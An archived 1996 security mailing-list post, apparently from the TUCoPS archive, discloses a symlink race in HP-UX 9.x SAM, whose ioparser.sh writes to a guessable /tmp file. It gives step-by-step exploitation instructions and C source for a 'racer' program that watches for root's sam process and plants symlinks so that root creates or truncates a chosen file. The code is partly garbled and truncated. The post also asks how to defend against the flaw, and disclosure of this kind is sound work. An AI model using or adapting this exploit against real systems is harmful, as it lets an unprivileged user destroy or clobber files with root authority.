TUCoPS :: HP/UX :: hpux_sam.txt

HP-UX SAM hole w/C Source

                               HP-UX SAM hole...
   John W. Jacobi (jjacobi@nova.umuc.edu)
   Wed, 25 Sep 1996 08:07:46 -0700
I never saw this distributed to listserv recipients, that
is why I have sent it again.  Could you please repost.

Hi all,

Could someone confirm this for me or tell me if I am mistaken ???
Perhaps suggest an easy way to prevent this ???

I have discovered something that any user can exploit to
cause root to create or truncate files on the system when root runs sam.
I have put the source code that I wrote to verify it below.

Version: HP-UX 9.04 & 9.05 on 9000/700 & 9000/800

My basic question is:

      "Is there any more global and easy way to prevent this from
aside from modifying the affected scripts ? as I have found that this
in other places then just sam ?"  Perhaps something rather generic on
how root
follows sym links ?  Maybe I'm just pipe dreaming...

How it worked for me:

What really happens is that sam is a script and it calls another script
named ioparser.sh which writes to temporary file in /tmp of whose name
easily guessable.  Basically, if you see sam pop up in the process
create a bunch of sym links of the format /tmp/<hostname>.<pid> where
hostname is the hostname and pid is a number beginning at the sam's PID
+ 1
o       n up to some value like sam's PID + 50.  When the sam script calls the
ioparser.sh, it redirects output to a file like /tmp/<hostname>.$$ (the
shell PID), follows the link, and as root creates or truncates what the
points to.

Any suggestions on what to do, however simple they might be would be


How to do it:

Go to your HP 9.04/5 system first.

1. Log into your system as a normal user.
2. Compile the program below, making any changes if you need to. (you
shouldn't need to)
3. Log in on another terminal, become root and insure that sam is not
        currently executing.
4. As the normal user log in, run the program that you compiled in step
5. On the root log in session, run sam.
6. Look at the target file.

/*    Code to exploit race of sam calling iopasrer.sh
    It will usually cause the ioparser.sh script run
        by root to follow the sym links created here to
    create or truncate TARGET_FILENAME as root.

        It ain't pretty and may not always work, but usually

        Compile on HP9000/[700/800] 9.04[5] with the command:

        cc racer.c -o racer -Ae


#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <symlink.h>

#define PROC_TO_LOOK_FOR "sam"                  /* The process to look
for in ps */
#define TARGET_FILENAME "/check_this"   /* File that is created or
trunc'ed */
#define NUM_SYM_LINKS 50                                /* Increase this
for systems that fork() alot */

void main(void)
        char ps_buf[65536];     /* ps data buffer */
        char *line;                     /* a pointer in to the ps_buf */
        char f1[80];            /* buffer space for the sym link name */
        char hostname[32];      /* buffer space to hold hostname, duh */
        int fd;                         /* fd is for the pipe */
        int ext;                        /* the extantion to place on the
symlink (pid) */
        int loop;                       /* Dumb loop variable,
suggestions ??? */

        unlink("ps_fifo");                                      /* Why
not */
        mkfifo("ps_fifo",S_IRUSR|S_IWUSR);      /* Need this */
        fd = open("ps_fifo",O_RDONLY|O_NONBLOCK); /* You read the pipe
        gethostname(hostname,32); /* gets the hostname just like
ioparser.sh !!! */

        printf("Looking for process %s, will exploit filename


        while(1) {
                system("/bin/ps -u 0 > ps_fifo");


                if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) {
                        while( *line != '\n' ) {

                        line[5] = '\0';
                        ext = atoi(line);

                        for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++)
                                sprintf(f1,"/tmp/%s.%d",hostname,ext +

                        while( (access(TARGET_FILENAME,F_OK)) < 0 );

                        printf("%s has run, wait a few seconds and check




TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2023 AOH